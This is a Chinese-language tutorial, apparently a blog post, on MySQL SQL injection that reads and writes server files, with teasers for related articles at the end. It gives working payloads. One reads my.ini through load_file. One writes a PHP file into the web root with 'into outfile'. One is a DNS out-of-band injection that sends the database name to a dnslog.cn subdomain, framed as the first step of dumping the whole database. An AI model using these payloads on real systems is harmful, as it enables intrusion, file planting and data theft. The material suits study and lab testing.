在my.ini加上secure_file_priv=
secure_file_priv=代表對檔案讀寫沒有限制
secure_file_priv=null代表不能進行檔案讀寫
secure_file_priv=d:/…代表只能對改路徑下檔案進行讀寫
函式:
load_file();
語句:
?id=-1 union select 1,load_file(「d:\phpkfgj\phpstudy\phptutorial\mysql\my.ini」),3-- -
"d:\phpkfgj\phpstudy\phptutorial\mysql\my.ini"處寫要讀的檔案路徑
效果:
函式:
into outfile或into dumpfile
語句:
?id=-1 union select 1,2,"<?php php info();?>" into outfile 「d:\phpkfgj\phpstudy\phptutorial\www\1.php」-- -
效果:
1.php成功寫入
語句:
?id=1 and load_file(concat("\\",(select database()),".3e9dai.dnslog.cn\1.txt"))-- -
3e9dai.dnslog.cn:可自行去dnslog**獲取乙個dns位址
效果:
可去dnslog上獲取剛剛檢視的資料庫名稱,之後即可進行資料脫庫
資料脫庫:
之後將結果進行16進製制轉字串即可
mysql帶外攻擊 mysql 帶外注入
帶外通道 有時候注入發現並沒有回顯,也不能利用時間盲注,那麼就可以利用帶外通道,也就是利用其他協議或者渠道,如http請求 dns解析 smb服務等將資料帶出。payload select load file concat select database xx.xx x 其中的load file的位...
注入攻擊之sql注入
在1998年,一位名為rfp的黑客發表了一篇題為 nt web technology vulnerabilities 的文章 注入攻擊的兩個條件 1 使用者能夠克制資料的輸入 在這裡,使用者能夠控制變數 2 原本要執行的 憑藉了使用者的輸入 一般輸入乙個 單引號就能引起執行查詢語句的語法錯誤,有些伺...
SQL注入檔案讀寫總結
sql注入漏洞除了可以對資料庫進行資料的查詢之外,還可以對的伺服器的檔案進行讀寫操作。靶場 首先在d盤根目錄下新建乙個test.txt檔案,為要讀取的目標檔案,內容為 好好學習,天天向上!語句 select load file 檔案路徑 union select 1,2,load file d 語句...